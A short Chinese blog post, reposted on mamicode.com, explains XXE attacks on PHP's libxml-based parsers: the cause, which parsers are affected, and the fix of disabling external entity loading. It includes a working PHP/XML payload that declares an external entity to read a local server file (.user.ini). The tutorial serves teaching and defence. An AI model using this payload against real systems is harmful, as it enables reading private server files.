码迷,mamicode.com
首页 > 其他好文 > 详细

xxe hacking

时间:2015-09-10 19:38:52      阅读:258      评论:0      收藏:0      [点我收藏+]

标签:xxe攻击原理

漏洞成因:

  XML 文件的解析依赖 libxml 库,而 libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理。

影响:

  常见的XML解析方法有:DOMDocument、SimpleXML、XMLReader,这三者都基于libxml库解析XML,所以均受影响,xml_parse函数则基于expact解析器,默认不载入外部DTD,不受影响。


修复:

  php解析xml文件之前使用libxml_disable_entity_loader(true) 来禁止加载外部实体。


攻击代码:

<?php
$xmlstring = <<<EOF
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE ANY [
 <!ENTITY xxe SYSTEM "file:///E:/wwwroot/.user.ini">
]>
<X>&xxe;</X>
EOF;

$xml = simplexml_load_string($xmlstring);

print_r($xml);
?>

技术分享


本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1693511

xxe hacking

标签:xxe攻击原理

原文地址:http://0x007.blog.51cto.com/6330498/1693511

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!